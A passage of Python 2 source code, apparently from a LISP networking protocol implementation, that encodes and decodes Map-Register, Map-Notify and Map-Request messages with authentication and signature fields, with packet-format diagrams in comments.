self.smr_bit = False
self.smr_invoked_bit = False
self.ddt_bit = False
self.to_etr = False
self.to_ms = False
self.info_reply = False
#enddef
def decode(self, packet):
packet_format = "BBBBQ"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(False)
typeval, bits, reserved, self.record_count, self.nonce = \
struct.unpack(packet_format, packet[:format_size])
self.type = typeval >> 4
if (self.type == LISP_MAP_REQUEST):
self.smr_bit = True if (typeval & 0x01) else False
self.rloc_probe = True if (typeval & 0x02) else False
self.smr_invoked_bit = True if (bits & 0x40) else False
#endif
if (self.type == LISP_ECM):
self.ddt_bit = True if (typeval & 0x04) else False
self.to_etr = True if (typeval & 0x02) else False
self.to_ms = True if (typeval & 0x01) else False
#endif
if (self.type == LISP_NAT_INFO):
self.info_reply = True if (typeval & 0x08) else False
#endif
return(True)
#enddef
def is_info_request(self):
return((self.type == LISP_NAT_INFO and self.is_info_reply() == False))
#enddef
def is_info_reply(self):
return(True if self.info_reply else False)
#enddef
def is_rloc_probe(self):
return(True if self.rloc_probe else False)
#enddef
def is_smr(self):
return(True if self.smr_bit else False)
#enddef
def is_smr_invoked(self):
return(True if self.smr_invoked_bit else False)
#enddef
def is_ddt(self):
return(True if self.ddt_bit else False)
#enddef
def is_to_etr(self):
return(True if self.to_etr else False)
#enddef
def is_to_ms(self):
return(True if self.to_ms else False)
#enddef
#endclass
#
# The Map-Register message format is:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# |Type=3 |P|S|I| Reserved | kid |e|F|T|a|m|M| Record Count |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Nonce . . . |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | . . . Nonce |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Key ID | Algorithm ID | Authentication Data Length |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# ~ Authentication Data ~
# +-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | | Record TTL |
# | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# R | Locator Count | EID mask-len | ACT |A| Reserved |
# e +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# c | Rsvd | Map-Version Number | EID-Prefix-AFI |
# o +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# r | EID-Prefix |
# d +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | /| Priority | Weight | M Priority | M Weight |
# | L +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | o | Unused Flags |L|p|R| Loc-AFI |
# | c +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | \| Locator |
# +-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | |
# | |
# +- ... xTR router-ID ... -+
# | |
# | |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | |
# +- ... xTR site-ID ... -+
# | |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# kid are 1 of 8 values that describe the encryption key-id used for
# encrypting Map-Register messages.When the Map-Register is encrypted, the
# entire message not including the first 4 bytes are chacha20 encrypted. The
# e-bit must be set by the ETR to indicate that the Map-Register was encrypted.
#
class lisp_map_register():
def __init__(self):
self.proxy_reply_requested = False
self.lisp_sec_present = False
self.xtr_id_present = False
self.map_notify_requested = False
self.mobile_node = False
self.merge_register_requested = False
self.use_ttl_for_timeout = False
self.map_register_refresh = False
self.record_count = 0
self.nonce = 0
self.alg_id = 0
self.key_id = 0
self.auth_len = 0
self.auth_data = 0
self.xtr_id = 0
self.site_id = 0
self.record_count = 0
self.sport = 0
self.encrypt_bit = 0
self.encryption_key_id = None
#enddef
def print_map_register(self):
xtr_id = lisp_hex_string(self.xtr_id)
line = ("{} -> flags: {}{}{}{}{}{}{}{}{}, record-count: " +
"{}, nonce: 0x{}, key/alg-id: {}/{}{}, auth-len: {}, xtr-id: " +
"0x{}, site-id: {}")
lprint(line.format(bold("Map-Register", False), \
"P" if self.proxy_reply_requested else "p",
"S" if self.lisp_sec_present else "s",
"I" if self.xtr_id_present else "i",
"T" if self.use_ttl_for_timeout else "t",
"R" if self.merge_register_requested else "r",
"M" if self.mobile_node else "m",
"N" if self.map_notify_requested else "n",
"F" if self.map_register_refresh else "f",
"E" if self.encrypt_bit else "e",
self.record_count, lisp_hex_string(self.nonce), self.key_id,
self.alg_id, " (sha1)" if (self.key_id == LISP_SHA_1_96_ALG_ID) \
else (" (sha2)" if (self.key_id == LISP_SHA_256_128_ALG_ID) else \
""), self.auth_len, xtr_id, self.site_id))
#enddef
def encode(self):
first_long = (LISP_MAP_REGISTER << 28) | self.record_count
if (self.proxy_reply_requested): first_long |= 0x08000000
if (self.lisp_sec_present): first_long |= 0x04000000
if (self.xtr_id_present): first_long |= 0x02000000
if (self.map_register_refresh): first_long |= 0x1000
if (self.use_ttl_for_timeout): first_long |= 0x800
if (self.merge_register_requested): first_long |= 0x400
if (self.mobile_node): first_long |= 0x200
if (self.map_notify_requested): first_long |= 0x100
if (self.encryption_key_id != None):
first_long |= 0x2000
first_long |= self.encryption_key_id << 14
#endif
#
# Append zeroed authentication data so we can compute hash latter.
#
if (self.alg_id == LISP_NONE_ALG_ID):
self.auth_len = 0
else:
if (self.alg_id == LISP_SHA_1_96_ALG_ID):
self.auth_len = LISP_SHA1_160_AUTH_DATA_LEN
#endif
if (self.alg_id == LISP_SHA_256_128_ALG_ID):
self.auth_len = LISP_SHA2_256_AUTH_DATA_LEN
#endif
#endif
packet = struct.pack("I", socket.htonl(first_long))
packet += struct.pack("QBBH", self.nonce, self.key_id, self.alg_id,
socket.htons(self.auth_len))
packet = self.zero_auth(packet)
return(packet)
#enddef
def zero_auth(self, packet):
offset = struct.calcsize("I") + struct.calcsize("QHH")
auth_data = ""
auth_len = 0
if (self.alg_id == LISP_NONE_ALG_ID): return(packet)
if (self.alg_id == LISP_SHA_1_96_ALG_ID):
auth_data = struct.pack("QQI", 0, 0, 0)
auth_len = struct.calcsize("QQI")
#endif
if (self.alg_id == LISP_SHA_256_128_ALG_ID):
auth_data = struct.pack("QQQQ", 0, 0, 0, 0)
auth_len = struct.calcsize("QQQQ")
#endif
packet = packet[0:offset] + auth_data + packet[offset+auth_len::]
return(packet)
#enddef
def encode_auth(self, packet):
offset = struct.calcsize("I") + struct.calcsize("QHH")
auth_len = self.auth_len
auth_data = self.auth_data
packet = packet[0:offset] + auth_data + packet[offset + auth_len::]
return(packet)
#enddef
def decode(self, packet):
orig_packet = packet
packet_format = "I"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return([None, None])
first_long = struct.unpack(packet_format, packet[:format_size])
first_long = socket.ntohl(first_long[0])
packet = packet[format_size::]
packet_format = "QBBH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return([None, None])
self.nonce, self.key_id, self.alg_id, self.auth_len = \
struct.unpack(packet_format, packet[:format_size])
self.auth_len = socket.ntohs(self.auth_len)
self.proxy_reply_requested = True if (first_long & 0x08000000) \
else False
self.lisp_sec_present = True if (first_long & 0x04000000) else False
self.xtr_id_present = True if (first_long & 0x02000000) else False
self.use_ttl_for_timeout = True if (first_long & 0x800) else False
self.map_register_refresh = True if (first_long & 0x1000) else False
self.merge_register_requested = True if (first_long & 0x400) else False
self.mobile_node = True if (first_long & 0x200) else False
self.map_notify_requested = True if (first_long & 0x100) else False
self.record_count = first_long & 0xff
#
# Decode e-bit and key-id for Map-Register decryption.
#
self.encrypt_bit = True if first_long & 0x2000 else False
if (self.encrypt_bit):
self.encryption_key_id = (first_long >> 14) & 0x7
#endif
#
# Decode xTR-ID and site-ID if sender set the xtr_id_present bit.
#
if (self.xtr_id_present):
if (self.decode_xtr_id(orig_packet) == False): return([None, None])
#endif
packet = packet[format_size::]
#
# Parse authentication and zero out the auth field in the packet.
#
if (self.auth_len != 0):
if (len(packet) < self.auth_len): return([None, None])
if (self.alg_id not in (LISP_NONE_ALG_ID, LISP_SHA_1_96_ALG_ID,
LISP_SHA_256_128_ALG_ID)):
lprint("Invalid authentication alg-id: {}".format(self.alg_id))
return([None, None])
#endif
auth_len = self.auth_len
if (self.alg_id == LISP_SHA_1_96_ALG_ID):
format_size = struct.calcsize("QQI")
if (auth_len < format_size):
lprint("Invalid sha1-96 authentication length")
return([None, None])
#endif
auth1, auth2, auth3 = struct.unpack("QQI", packet[:auth_len])
auth4 = ""
elif (self.alg_id == LISP_SHA_256_128_ALG_ID):
format_size = struct.calcsize("QQQQ")
if (auth_len < format_size):
lprint("Invalid sha2-256 authentication length")
return([None, None])
#endif
auth1, auth2, auth3, auth4 = struct.unpack("QQQQ",
packet[:auth_len])
else:
lprint("Unsupported authentication alg-id value {}".format( \
self.alg_id))
return([None, None])
#endif
self.auth_data = lisp_concat_auth_data(self.alg_id, auth1, auth2,
auth3, auth4)
orig_packet = self.zero_auth(orig_packet)
packet = packet[self.auth_len::]
#endif
return([orig_packet, packet])
#enddef
def encode_xtr_id(self, packet):
xtr_id_upper = self.xtr_id >> 64
xtr_id_lower = self.xtr_id & 0xffffffffffffffff
xtr_id_upper = byte_swap_64(xtr_id_upper)
xtr_id_lower = byte_swap_64(xtr_id_lower)
site_id = byte_swap_64(self.site_id)
packet += struct.pack("QQQ", xtr_id_upper, xtr_id_lower, site_id)
return(packet)
#enddef
def decode_xtr_id(self, packet):
format_size = struct.calcsize("QQQ")
if (len(packet) < format_size): return([None, None])
packet = packet[len(packet)-format_size::]
xtr_id_upper, xtr_id_lower, site_id = struct.unpack("QQQ",
packet[:format_size])
xtr_id_upper = byte_swap_64(xtr_id_upper)
xtr_id_lower = byte_swap_64(xtr_id_lower)
self.xtr_id = (xtr_id_upper << 64) | xtr_id_lower
self.site_id = byte_swap_64(site_id)
return(True)
#enddef
#endclass
# The Map-Notify/Map-Notify-Ack message format is:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# |Type=4/5| Reserved | Record Count |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Nonce . . . |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | . . . Nonce |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Key ID | Algorithm ID | Authentication Data Length |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# ~ Authentication Data ~
# +-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | | Record TTL |
# | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# R | Locator Count | EID mask-len | ACT |A| Reserved |
# e +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# c | Rsvd | Map-Version Number | EID-Prefix-AFI |
# o +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# r | EID-Prefix |
# d +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | /| Priority | Weight | M Priority | M Weight |
# | L +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | o | Unused Flags |L|p|R| Loc-AFI |
# | c +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | \| Locator |
# +-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
class lisp_map_notify():
def __init__(self, lisp_sockets):
self.etr = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.etr_port = 0
self.retransmit_timer = None
self.lisp_sockets = lisp_sockets
self.retry_count = 0
self.record_count = 0
self.alg_id = LISP_NONE_ALG_ID
self.key_id = 0
self.auth_len = 0
self.auth_data = ""
self.nonce = 0
self.nonce_key = ""
self.packet = None
self.site = ""
self.map_notify_ack = False
self.eid_records = ""
self.eid_list = []
#enddef
def print_notify(self):
auth_data = binascii.hexlify(self.auth_data)
if (self.alg_id == LISP_SHA_1_96_ALG_ID and len(auth_data) != 40):
auth_data = self.auth_data
elif (self.alg_id == LISP_SHA_256_128_ALG_ID and len(auth_data) != 64):
auth_data = self.auth_data
#endif
line = ("{} -> record-count: {}, nonce: 0x{}, key/alg-id: " +
"{}{}{}, auth-len: {}, auth-data: {}")
lprint(line.format(bold("Map-Notify-Ack", False) if \
self.map_notify_ack else bold("Map-Notify", False),
self.record_count, lisp_hex_string(self.nonce), self.key_id,
self.alg_id, " (sha1)" if (self.key_id == LISP_SHA_1_96_ALG_ID) \
else (" (sha2)" if (self.key_id == LISP_SHA_256_128_ALG_ID) else \
""), self.auth_len, auth_data))
#enddef
def zero_auth(self, packet):
if (self.alg_id == LISP_NONE_ALG_ID): return(packet)
if (self.alg_id == LISP_SHA_1_96_ALG_ID):
auth_data = struct.pack("QQI", 0, 0, 0)
#endif
if (self.alg_id == LISP_SHA_256_128_ALG_ID):
auth_data = struct.pack("QQQQ", 0, 0, 0, 0)
#endif
packet += auth_data
return(packet)
#enddef
def encode(self, eid_records, password):
if (self.map_notify_ack):
first_long = (LISP_MAP_NOTIFY_ACK << 28) | self.record_count
else:
first_long = (LISP_MAP_NOTIFY << 28) | self.record_count
#endif
packet = struct.pack("I", socket.htonl(first_long))
packet += struct.pack("QBBH", self.nonce, self.key_id, self.alg_id,
socket.htons(self.auth_len))
if (self.alg_id == LISP_NONE_ALG_ID):
self.packet = packet + eid_records
return(self.packet)
#endif
#
# Run authentication hash across packet.
#
packet = self.zero_auth(packet)
packet += eid_records
hashval = lisp_hash_me(packet, self.alg_id, password, False)
offset = struct.calcsize("I") + struct.calcsize("QHH")
auth_len = self.auth_len
self.auth_data = hashval
packet = packet[0:offset] + hashval + packet[offset + auth_len::]
self.packet = packet
return(packet)
#enddef
def decode(self, packet):
orig_packet = packet
packet_format = "I"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
first_long = struct.unpack(packet_format, packet[:format_size])
first_long = socket.ntohl(first_long[0])
self.map_notify_ack = ((first_long >> 28) == LISP_MAP_NOTIFY_ACK)
self.record_count = first_long & 0xff
packet = packet[format_size::]
packet_format = "QBBH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
self.nonce, self.key_id, self.alg_id, self.auth_len = \
struct.unpack(packet_format, packet[:format_size])
self.nonce_key = lisp_hex_string(self.nonce)
self.auth_len = socket.ntohs(self.auth_len)
packet = packet[format_size::]
self.eid_records = packet[self.auth_len::]
if (self.auth_len == 0): return(self.eid_records)
#
# Parse authentication and zero out the auth field in the packet.
#
if (len(packet) < self.auth_len): return(None)
auth_len = self.auth_len
if (self.alg_id == LISP_SHA_1_96_ALG_ID):
auth1, auth2, auth3 = struct.unpack("QQI", packet[:auth_len])
auth4 = ""
#endif
if (self.alg_id == LISP_SHA_256_128_ALG_ID):
auth1, auth2, auth3, auth4 = struct.unpack("QQQQ",
packet[:auth_len])
#endif
self.auth_data = lisp_concat_auth_data(self.alg_id, auth1, auth2,
auth3, auth4)
format_size = struct.calcsize("I") + struct.calcsize("QHH")
packet = self.zero_auth(orig_packet[:format_size])
format_size += auth_len
packet += orig_packet[format_size::]
return(packet)
#enddef
#endclass
#
# Map-Request message format is:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# |Type=1 |A|M|P|S|p|s|m|I|Reserved |L|D| IRC | Record Count |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Nonce . . . |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | . . . Nonce |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Source-EID-AFI | Source EID Address ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | ITR-RLOC-AFI 1 | ITR-RLOC Address 1 ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | ITR-RLOC-AFI n | ITR-RLOC Address n ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# / |N| Reserved | EID mask-len | EID-prefix-AFI |
# Rec +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# \ | EID-prefix ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Map-Reply Record ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Mapping Protocol Data |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | xTR-ID |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# When a Map-Request is signed, the hash is over the IPv6 CGA based EID,
# the Map-Request Nonce, and the EID-record. The signature is placed in
# the Source-EID as a LCAF JSON Type string of { "source-eid" : "<cga>",
# "signature-eid" : "<cga-of-signer>", "signature" : "<sig"> }.
#
# Generating private/public key-pairs via:
#
# openssl genpkey -algorithm RSA -out privkey.pem \
# -pkeyopt rsa_keygen_bits:2048
# openssl rsa -pubout -in privkey.pem -out pubkey.pem
#
# And use ecdsa.VerifyingKey.from_pem() after reading in file.
#
# xTR-ID is appended to the end of a Map-Request when a subscription request
# is piggybacked (when self.subscribe_bit is True).
#
class lisp_map_request():
def __init__(self):
self.auth_bit = False
self.map_data_present = False
self.rloc_probe = False
self.smr_bit = False
self.pitr_bit = False
self.smr_invoked_bit = False
self.mobile_node = False
self.xtr_id_present = False
self.local_xtr = False
self.dont_reply_bit = False
self.itr_rloc_count = 0
self.record_count = 0
self.nonce = 0
self.signature_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.source_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.target_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.target_group = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.itr_rlocs = []
self.keys = None
self.privkey_filename = None
self.map_request_signature = None
self.subscribe_bit = False
self.xtr_id = None
#enddef
def print_prefix(self):
if (self.target_group.is_null()):
return(green(self.target_eid.print_prefix(), False))
#endif
return(green(self.target_eid.print_sg(self.target_group), False))
#enddef
def print_map_request(self):
xtr_id = ""
if (self.xtr_id != None and self.subscribe_bit):
xtr_id = "subscribe, xtr-id: 0x{}, ".format(lisp_hex_string( \
self.xtr_id))
#endif
line = ("{} -> flags: {}{}{}{}{}{}{}{}{}{}, itr-rloc-" +
"count: {} (+1), record-count: {}, nonce: 0x{}, source-eid: " +
"afi {}, {}{}, target-eid: afi {}, {}, {}ITR-RLOCs:")
lprint(line.format(bold("Map-Request", False), \
"A" if self.auth_bit else "a",
"D" if self.map_data_present else "d",
"R" if self.rloc_probe else "r",
"S" if self.smr_bit else "s",
"P" if self.pitr_bit else "p",
"I" if self.smr_invoked_bit else "i",
"M" if self.mobile_node else "m",
"X" if self.xtr_id_present else "x",
"L" if self.local_xtr else "l",
"D" if self.dont_reply_bit else "d", self.itr_rloc_count,
self.record_count, lisp_hex_string(self.nonce),
self.source_eid.afi, green(self.source_eid.print_address(), False),
" (with sig)" if self.map_request_signature != None else "",
self.target_eid.afi, green(self.print_prefix(), False), xtr_id))
keys = self.keys
for itr in self.itr_rlocs:
lprint(" itr-rloc: afi {} {}{}".format(itr.afi,
red(itr.print_address_no_iid(), False),
"" if (keys == None) else ", " + keys[1].print_keys()))
keys = None
#endfor
#enddef
def sign_map_request(self, privkey):
sig_eid = self.signature_eid.print_address()
source_eid = self.source_eid.print_address()
target_eid = self.target_eid.print_address()
sig_data = lisp_hex_string(self.nonce) + source_eid + target_eid
self.map_request_signature = privkey.sign(sig_data)
sig = binascii.b2a_base64(self.map_request_signature)
sig = { "source-eid" : source_eid, "signature-eid" : sig_eid,
"signature" : sig }
return(json.dumps(sig))
#enddef
def verify_map_request_sig(self, pubkey):
sseid = green(self.signature_eid.print_address(), False)
if (pubkey == None):
lprint("Public-key not found for signature-EID {}".format(sseid))
return(False)
#endif
source_eid = self.source_eid.print_address()
target_eid = self.target_eid.print_address()
sig_data = lisp_hex_string(self.nonce) + source_eid + target_eid
pubkey = binascii.a2b_base64(pubkey)
good = True
try:
key = ecdsa.VerifyingKey.from_pem(pubkey)
except:
lprint("Invalid public-key in mapping system for sig-eid {}". \
format(self.signature_eid.print_address_no_iid()))
good = False
#endtry
if (good):
try:
good = key.verify(self.map_request_signature, sig_data)
except:
good = False
#endtry
#endif
passfail = bold("passed" if good else "failed", False)
lprint("Signature verification {} for EID {}".format(passfail, sseid))
return(good)
#enddef
def encode(self, probe_dest, probe_port):
first_long = (LISP_MAP_REQUEST << 28) | self.record_count
first_long = first_long | (self.itr_rloc_count << 8)
if (self.auth_bit): first_long |= 0x08000000
if (self.map_data_present): first_long |= 0x04000000
if (self.rloc_probe): first_long |= 0x02000000
if (self.smr_bit): first_long |= 0x01000000
if (self.pitr_bit): first_long |= 0x00800000
if (self.smr_invoked_bit): first_long |= 0x00400000
if (self.mobile_node): first_long |= 0x00200000
if (self.xtr_id_present): first_long |= 0x00100000
if (self.local_xtr): first_long |= 0x00004000
if (self.dont_reply_bit): first_long |= 0x00002000
packet = struct.pack("I", socket.htonl(first_long))
packet += struct.pack("Q", self.nonce)
#
# Check if Map-Request is going to be signed. If so, encode json-string
# in source-EID field. Otherwise, just encode source-EID with instance-
# id in source-EID field.
#
encode_sig = False
filename = self.privkey_filename
if (filename != None and os.path.exists(filename)):
f = open(filename, "r"); key = f.read(); f.close()
try:
key = ecdsa.SigningKey.from_pem(key)
except:
return(None)
#endtry
json_string = self.sign_map_request(key)
encode_sig = True
elif (self.map_request_signature != None):
sig = binascii.b2a_base64(self.map_request_signature)
json_string = { "source-eid" : self.source_eid.print_address(),
"signature-eid" : self.signature_eid.print_address(),
"signature" : sig }
json_string = json.dumps(json_string)
encode_sig = True
#endif
if (encode_sig):
lcaf_type = LISP_LCAF_JSON_TYPE
lcaf_afi = socket.htons(LISP_AFI_LCAF)
lcaf_len = socket.htons(len(json_string) + 2)
json_len = socket.htons(len(json_string))
packet += struct.pack("HBBBBHH", lcaf_afi, 0, 0, lcaf_type, 0,
lcaf_len, json_len)
packet += json_string
packet += struct.pack("H", 0)
else:
if (self.source_eid.instance_id != 0):
packet += struct.pack("H", socket.htons(LISP_AFI_LCAF))
packet += self.source_eid.lcaf_encode_iid()
else:
packet += struct.pack("H", socket.htons(self.source_eid.afi))
packet += self.source_eid.pack_address()
#endif
#endif
#
# For RLOC-probes, see if keys already negotiated for RLOC. If so,
# use them so a new DH exchange does not happen.
#
if (probe_dest):
if (probe_port == 0): probe_port = LISP_DATA_PORT
addr_str = probe_dest.print_address_no_iid() + ":" + \
str(probe_port)
if (lisp_crypto_keys_by_rloc_encap.has_key(addr_str)):
self.keys = lisp_crypto_keys_by_rloc_encap[addr_str]
#endif
#endif
#
# If security is enabled, put security parameters in the first
# ITR-RLOC.
#
for itr in self.itr_rlocs:
if (lisp_data_plane_security and self.itr_rlocs.index(itr) == 0):
if (self.keys == None or self.keys[1] == None):
keys = lisp_keys(1)
self.keys = [None, keys, None, None]
#endif
keys = self.keys[1]
keys.add_key_by_nonce(self.nonce)
packet += keys.encode_lcaf(itr)
else:
packet += struct.pack("H", socket.htons(itr.afi))
packet += itr.pack_address()
#endif
#endfor
mask_len = 0 if self.target_eid.is_binary() == False else \
self.target_eid.mask_len
subscribe = 0
if (self.subscribe_bit):
subscribe = 0x80
self.xtr_id_present = True
if (self.xtr_id == None):
self.xtr_id = random.randint(0, (2**128)-1)
#endif
#endif
packet_format = "BB"
packet += struct.pack(packet_format, subscribe, mask_len)
if (self.target_group.is_null() == False):
packet += struct.pack("H", socket.htons(LISP_AFI_LCAF))
packet += self.target_eid.lcaf_encode_sg(self.target_group)
elif (self.target_eid.instance_id != 0 or
self.target_eid.is_geo_prefix()):
packet += struct.pack("H", socket.htons(LISP_AFI_LCAF))
packet += self.target_eid.lcaf_encode_iid()
else:
packet += struct.pack("H", socket.htons(self.target_eid.afi))
packet += self.target_eid.pack_address()
#endif
#
# If this is a subscription request, append xTR-ID to end of packet.
#
if (self.subscribe_bit): packet = self.encode_xtr_id(packet)
return(packet)
#enddef
def lcaf_decode_json(self, packet):
packet_format = "BBBBHH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
rsvd1, flags, lcaf_type, rsvd2, lcaf_len, json_len = \
struct.unpack(packet_format, packet[:format_size])
if (lcaf_type != LISP_LCAF_JSON_TYPE): return(packet)
#
# Do lcaf-length and json-length checks first.
#
lcaf_len = socket.ntohs(lcaf_len)
json_len = socket.ntohs(json_len)
packet = packet[format_size::]
if (len(packet) < lcaf_len): return(None)
if (lcaf_len != json_len + 2): return(None)
#
# Pull out JSON string from packet.
#
try:
json_string = json.loads(packet[0:json_len])
except:
return(None)
#endtry
packet = packet[json_len::]
#
# Get JSON encoded afi-address in JSON, we are expecting AFI of 0.
#
packet_format = "H"
format_size = struct.calcsize(packet_format)
afi = struct.unpack(packet_format, packet[:format_size])[0]
packet = packet[format_size::]
if (afi != 0): return(packet)
#
# Store JSON data internally.
#
if (json_string.has_key("source-eid") == False): return(packet)
eid = json_string["source-eid"]
afi = LISP_AFI_IPV4 if eid.count(".") == 3 else LISP_AFI_IPV6 if \
eid.count(":") == 7 else None
if (afi == None):
lprint("Bad JSON 'source-eid' value: {}".format(eid))
return(None)
#endif
self.source_eid.afi = afi
self.source_eid.store_address(eid)
if (json_string.has_key("signature-eid") == False): return(packet)
eid = json_string["signature-eid"]
if (eid.count(":") != 7):
lprint("Bad JSON 'signature-eid' value: {}".format(eid))
return(None)
#endif
self.signature_eid.afi = LISP_AFI_IPV6
self.signature_eid.store_address(eid)
if (json_string.has_key("signature") == False): return(packet)
sig = binascii.a2b_base64(json_string["signature"])
self.map_request_signature = sig
return(packet)
#enddef
def decode(self, packet, source, port):
packet_format = "I"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
first_long = struct.unpack(packet_format, packet[:format_size])
first_long = first_long[0]
packet = packet[format_size::]
packet_format = "Q"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
nonce = struct.unpack(packet_format, packet[:format_size])
packet = packet[format_size::]
first_long = socket.ntohl(first_long)
self.auth_bit = True if (first_long & 0x08000000) else False
self.map_data_present = True if (first_long & 0x04000000) else False
self.rloc_probe = True if (first_long & 0x02000000) else False
self.smr_bit = True if (first_long & 0x01000000) else False
self.pitr_bit = True if (first_long & 0x00800000) else False
self.smr_invoked_bit = True if (first_long & 0x00400000) else False
self.mobile_node = True if (first_long & 0x00200000) else False
self.xtr_id_present = True if (first_long & 0x00100000) else False
self.local_xtr = True if (first_long & 0x00004000) else False
self.dont_reply_bit = True if (first_long & 0x00002000) else False
self.itr_rloc_count = ((first_long >> 8) & 0x1f) + 1
self.record_count = first_long & 0xff
self.nonce = nonce[0]
#
